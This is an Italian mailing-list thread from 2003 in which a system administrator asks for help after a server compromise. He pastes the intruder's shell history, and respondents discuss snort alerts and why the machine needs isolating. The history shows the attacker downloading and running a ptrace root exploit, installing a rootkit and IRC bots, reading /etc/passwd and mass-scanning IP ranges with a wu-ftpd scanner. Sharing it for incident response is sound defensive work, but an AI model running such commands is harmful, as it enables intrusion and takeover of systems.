Re: server bucato
On Mon, Nov 10, 2003 at 11:00:58AM +0100, Marco Menchise wrote: > On Mon, Nov 10, 2003 at 10:24:38AM +0100, paolino wrote: > > On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote: > > > On Wednesday 05 November 2003 20:54, paolino wrote: > > > > ciao, poco tempo fa mi è stato bucato un server... > > > > non potendo reinstallarlo, almeno per il momento, volevo trovare un > > > > mdo per tappare i vari buchi. > > > > > > Come ti sei accorto della sua compromissione? > > > > Me ne sono accorto perche in giro per il sistema c'erano un tot di file, > > decisamente particolari. > > Uno di quelli più interessanti è il file .bash_history dell'utente guest > > che vi allego. > > Ma l'utente guest aveva gia' un account sulla macchina? oppure e' > riuscito a guadagnarsi anche quello? No, l'utente guest era già esistente in precedenza... purtroppo mi è stato chiesto per essere usato da samba. quando è successo il fattaccio, mi hanno detto che probabilmente, per guadagnarsi l'accesso al sistema avevano sfruttato un problema di ssh o dell'ftp: OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3, SSH protocols 1.5/2.0, OpenSSL 0x0090603f ProFTPD Version 1.2.5rc1 > > Marco > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- La teoria e' quando si sa tutto ma non funziona niente. La pratica e' quando funziona tutto ma non si sa il perche'. In ogni caso si finisce sempre a coniugare la teoria con la pratica : non funziona niente e non si sa il perche'. Albert Einstein
Re: server bucato
On Mon, Nov 10, 2003 at 10:24:38AM +0100, paolino wrote: > On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote: > > On Wednesday 05 November 2003 20:54, paolino wrote: > > > ciao, poco tempo fa mi ? stato bucato un server... > > > non potendo reinstallarlo, almeno per il momento, volevo trovare un > > > mdo per tappare i vari buchi. > > > > Come ti sei accorto della sua compromissione? [...] > wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c > gcc ptrace-kmod.c -o pt > ./pt ahahah!!! kernel bacato eh? 2.4.18 scommetto. Se ptrace e' andato, ha impiegato 1 secondo ad avere i privilegi di root (e la macchina e' una mina vagante) ciao -- mattia :wq!
Re: server bucato
On Mon, Nov 10, 2003 at 10:24:38AM +0100, paolino wrote: > On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote: > > On Wednesday 05 November 2003 20:54, paolino wrote: > > > ciao, poco tempo fa mi è stato bucato un server... > > > non potendo reinstallarlo, almeno per il momento, volevo trovare un > > > mdo per tappare i vari buchi. > > > > Come ti sei accorto della sua compromissione? > > Me ne sono accorto perche in giro per il sistema c'erano un tot di file, > decisamente particolari. > Uno di quelli più interessanti è il file .bash_history dell'utente guest che > vi allego. Ma l'utente guest aveva gia' un account sulla macchina? oppure e' riuscito a guadagnarsi anche quello? Marco
Re: server bucato
Alle 10:24, lunedì 10 novembre 2003, paolino ha scritto: > Uno di quelli più interessanti è il file .bash_history dell'utente > guest che vi allego. Certo che e` stato un po' troppo pollo a lasciare li` in bella vista il .bash_history... -- Cesare D'Amico - http://www.phpday.it "E` un'emergenza!!! Dovrei fare questo-e-questaltro ma non posso perche' la mia testa e` piena di segatura e criceti!!!" -- un utente [ http://www.soft-land.org/storie/ ]
Re: server bucato
On Mon, 10 Nov 2003 (10:24), paolino wrote: > ./useradd pippo Tralascio tutto il resto, che mi fa semplicemente dire che la macchina _deve_ essere reinstallata. Questa riga mi pare abbastanza interessante perché fa supporre che l'attaccante sia italiano; varrebbe la pena di cercare a fondo nei log, per recuperare qualche informazione in più su di lui (IP, orario dell'attacco, ...) e sporgere denuncia. Ciao, Daniele -- Free your mind GNU/Linux registered user #219615 @ GNU/Linux registered machine #103942 signature.asc Description: Digital signature
Re: server bucato
On Mon, 10 Nov 2003 (09:37), paolino wrote: > > I presunti attacchi 'shellcode' segnalati da snort sono spesso dei > > falsi positivi in quanto i file che possono transitare in rete > > (download / upload) ingannano spesso snort. > > Come devo fare per istruire snort su questi falsi positivi?? Devo > limitare i log inutili altrimenti passo un sacco di tempo a capire se > preoccuparmi o meno.. Per quanto ne so io non è possibile limitare questi falsi positivi. Il controllo di snort viene fatto cercando certe sequenze di bit predefinite nei pacchetti che girano per la rete e queste sequenze purtroppo sono piuttosto frequenti nei file binari. Ciao, Daniele -- Free your mind GNU/Linux registered user #219615 @ GNU/Linux registered machine #103942 signature.asc Description: Digital signature
Re: server bucato
On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote: > On Wednesday 05 November 2003 20:54, paolino wrote: > > ciao, poco tempo fa mi è stato bucato un server... > > non potendo reinstallarlo, almeno per il momento, volevo trovare un > > mdo per tappare i vari buchi. > > Come ti sei accorto della sua compromissione? Me ne sono accorto perche in giro per il sistema c'erano un tot di file, decisamente particolari. Uno di quelli più interessanti è il file .bash_history dell'utente guest che vi allego. Dategli un'occhiata.. a quel punto ho fatto un po di controlli, è ho trovato un sacco di cose.. Binari modificati in /bin /sbin ... non me ne sono accorto finchè, dopo anomalie di funzionamento degli stessi, non ho fatto un lsattr. Poi ho fatto andare chkrootkit e mi ha trovato un tot di processi hidden ecc. ecc. Adesso penso di aver "ripulito" la macchina almeno dai rootkit che erano stati messi. ho inserito un tot di controlli in piu (snort; aide e tiger), ho sistemato il logchek, chiuso un paio di servizi e acceso un cero... Speriamo che per ora basti :) fatemi sapere Paolino > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- La teoria e' quando si sa tutto ma non funziona niente. La pratica e' quando funziona tutto ma non si sa il perche'. In ogni caso si finisce sempre a coniugare la teoria con la pratica : non funziona niente e non si sa il perche'. Albert Einstein cd /pub/ ls exit id ./pt exit ls passwd ls wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c gcc ptrace-kmod.c -o pt ./pt exit ls nslookup id whoami uname -a ps -fea cat /etc/passwd passwd backup passwd proxy ls rm -ef pt rm -rf ptrace-kmod.c rm -rf pt ls ls /pt ls pt ./pt ls cd .atos mkdir .atos cd .atos wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz tar -zxvf emech-2.8.4.tar.gz rm -rf emech-2.8.4.tar.gz cd emech-2.8.4 ./configure y make mv sample.set mech.txt cat > mech.set ./genuser ./mech ls ./mech ./emech.users ./genuser ./mech passwd ls cd .atos ls ls uname -a wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c gcc ptrace-kmod.c -o pt ./pt cat /etc/passwd passwd mysql passwd temp passwd www passwd www passwd proxy passwd www-data ls wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz nslookup ls wget http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz tar -zxvf psyBNC2.3.1.tar.gz cd psybnc make pico psybnc.conf ls ps -fea wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz tar -zxvf emech-2.8.4.tar.gz rm -rf emech-2.8.4.tar.gz cd emech-2.8.4 ./configure make make install mv sample.set mech.txt cat > mech.set ./genuser ./mech ./mech ./mech ls cd emech-2.8.4 ./mech ./mech ./mech kill -9 guest kill -9 1782 kill -9 1847 kill -9 1849 kill -9 1865 kill -9 init: Mech(s) added [ shitz ] kill -9 1867 kill -9 1956 ls cd emech-2.8.4 ./genuser ./mech ./mech ps -fea ls ps -fea passwd -Z ls ./pt ls uname -a ps -fea wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz tar -zxvf emech-2.8.4.tar.gz rm -rf emech-2.8.4.tar.gz cd emech-2.8.4 ./configure make make install mv sample.set mech.txt cat > mech.set ./genuser ./mech ./mech ps -fea tar -zxvf autowu.zip tar -zvf autowu.zip ls tar -zxvf autowu.zip ls ps -fea ls cd emech-2.8.4 ./mech cd .. ls ls wget http://comunidad.vlex.com/wscrip/mamadas/scannerstgz/autowu.zip passwd -Z tar -zxvf autowu.zip ls ./pt wget http://mx.geocities.com/straorg/scanner/autowu.tgz tar -zxvf autowu.tgz cd autowu ./awu 214.115 cd .. cd .kde cd .kde ls mkdir .scan cd .scan wget http://mx.geocities.com/straorg/scanner/autowu.tgz tar -zxvf autowu.tgz cd .kde cd autowu ./awu 0.0 ./awu 212.12 passwd -Z ls ./pt ps -fea kill -9 5938 ls tar -zxvf psyBNC2.3.1.tar.gz cd psybnc make pico psybnc.conf cd .. ls cd emech-2.8.4 ./mech ./mech ps -fea ls cd emech-2.8.4 ./mech ps -fea passwd -Z cd .. ls ./pt wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz tar zxf asmd.tgz perl install.pl passwd -Z ls wget www.geocities.com/master0n/bestwu.tgz tar -zxvf bestwu.tgz cd aw cd aw ./awu 0.0 ./awu 217.13 ./awu 217.16 ./awu 219.230 ./awu 219.213 ./awu 219.20 ./awu 218.121 ./awu 128.17 ./awu 12.143 ./awu 212.15 ./awu 212.112 ./awu 212.20 ./awu 212.24 ./awu 212.29 /wu -a -v -d -f ns.hostuniverse.com ps -fea who kill -9 28752 cd /usr/sbin who ./userdel Ilic who cd .. ls cd .. ls wget www.geocities.com/master0n/bestwu.tgz tar -zxvf bestwu.tgz cd aw ./awu 0.0 ./awu 137.2 ./awu 137.19 ./awu 218.12 ./awu 218.13 ./awu 208.101 ./awu 208.41 ./awu 208.119 ./awu 208.211 passwd -Z ls ll ls -lap ll ls ls -lap mc cd /usr/sbin ls ./useradd pippo ./userdel asdueba
Re: server bucato
On Sun, Nov 09, 2003 at 09:15:32PM +0100, GHERdO wrote: > paolino <[EMAIL PROTECTED]> scriveva: > > p> ciao, poco tempo fa mi è stato bucato un server... non potendo > p> reinstallarlo, almeno per il momento, volevo trovare un mdo per > p> tappare i vari buchi. Ho installato snort oggi e questo è il primo > p> risultato: > > "non potendo reinstallarlo"? ROTFL. > Completamente daccordo con te... Stiamo aspettando l'arrivo di una nuova macchina che faccia da server, visto che è questione di pochi giorni... preferiscono rischiare un po e aspettare di rifare l'installazione sulla macchina nuova. > Una macchina compromessa *deve* essere isolata. > > -- > GHERdO, happy GNU/linux user. > > ... Boys don't Cry! > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- La teoria e' quando si sa tutto ma non funziona niente. La pratica e' quando funziona tutto ma non si sa il perche'. In ogni caso si finisce sempre a coniugare la teoria con la pratica : non funziona niente e non si sa il perche'. Albert Einstein
Re: server bucato
On Sun, Nov 09, 2003 at 05:59:56PM +0100, Daniele wrote: > On Wed, 5 Nov 2003 (20:54), paolino wrote: > (Com'è che il messaggio è arrivato solo oggi 9 Nov?) Purtroppo avevo scritto la mail qualche giorno fa... ero un po stupito che non arrivasse nulla sulla lista ma ero pieno di cose da fare... e l'altro giorno, mi sono ricordato di aver tirato giu sendmail per un lavoretto e di non averlo riattivato. per cui è rimasto in coda per un po di giorni :P > > [**] [1:648:4] SHELLCODE x86 NOOP [**] > > I presunti attacchi 'shellcode' segnalati da snort sono spesso dei falsi > positivi in quanto i file che possono transitare in rete (download / > upload) ingannano spesso snort. Come devo fare per istruire snort su questi falsi positivi?? Devo limitare i log inutili altrimenti passo un sacco di tempo a capire se preoccuparmi o meno.. > > >10 192.168.3.254 192.168.3.9 WEB-CGI calendar access > > Se non hai installato / non vuoi CGI questo potrebbe essere più > interessante. Proviene inoltre da quello che di solito è il gateway... L'indirizzo del mi gw è 3.1 quindi questo arriva da un'altra macchina > > > Portscans performed to/from HOME_NET > > === > > # of > > attacks from > > === > > 4 192.168.3.9 > > Anche questo è sicuramente più interessante, ti conviene controllare nei > log di snort (se lo riporta) verso quale indirizzo è stato fatto il > portscan. Provo a fare dei controlli. grazie per l'aiuto paolino > > In caso di server compromesso, ad ogni modo, mantenere la macchina sulla > rete è _altamente_ sconsigliato. > > Ciao, > Daniele > -- > Free your mind > GNU/Linux registered user #219615 @ GNU/Linux registered machine #103942 -- La teoria e' quando si sa tutto ma non funziona niente. La pratica e' quando funziona tutto ma non si sa il perche'. In ogni caso si finisce sempre a coniugare la teoria con la pratica : non funziona niente e non si sa il perche'. Albert Einstein
Re: server bucato
On Wednesday 05 November 2003 20:54, paolino wrote: > ciao, poco tempo fa mi è stato bucato un server... > non potendo reinstallarlo, almeno per il momento, volevo trovare un > mdo per tappare i vari buchi. Come ti sei accorto della sua compromissione?
Re: server bucato
paolino <[EMAIL PROTECTED]> scriveva: p> ciao, poco tempo fa mi è stato bucato un server... non potendo p> reinstallarlo, almeno per il momento, volevo trovare un mdo per p> tappare i vari buchi. Ho installato snort oggi e questo è il primo p> risultato: "non potendo reinstallarlo"? ROTFL. Una macchina compromessa *deve* essere isolata. -- GHERdO, happy GNU/linux user. ... Boys don't Cry!
Re: server bucato
On Wed, 5 Nov 2003 (20:54), paolino wrote: (Com'è che il messaggio è arrivato solo oggi 9 Nov?) > [**] [1:648:4] SHELLCODE x86 NOOP [**] I presunti attacchi 'shellcode' segnalati da snort sono spesso dei falsi positivi in quanto i file che possono transitare in rete (download / upload) ingannano spesso snort. >10 192.168.3.254 192.168.3.9 WEB-CGI calendar access Se non hai installato / non vuoi CGI questo potrebbe essere più interessante. Proviene inoltre da quello che di solito è il gateway... > Portscans performed to/from HOME_NET > === > # of > attacks from > === > 4 192.168.3.9 Anche questo è sicuramente più interessante, ti conviene controllare nei log di snort (se lo riporta) verso quale indirizzo è stato fatto il portscan. In caso di server compromesso, ad ogni modo, mantenere la macchina sulla rete è _altamente_ sconsigliato. Ciao, Daniele -- Free your mind GNU/Linux registered user #219615 @ GNU/Linux registered machine #103942 signature.asc Description: Digital signature
Re: server bucato
On Wednesday 05 November 2003 20:54, paolino wrote: > ciao, poco tempo fa mi è stato bucato un server... > non potendo reinstallarlo, almeno per il momento, volevo trovare un > mdo per tappare i vari buchi. Ho installato snort oggi e questo è > il primo risultato: > > > Premetto che 192.168.3.9 è la macchina in questione.. > tutte le alre sono cmq locali... domani capirò quali... Bucata dall'interno quindi, un attacco proveniente dalla LAN.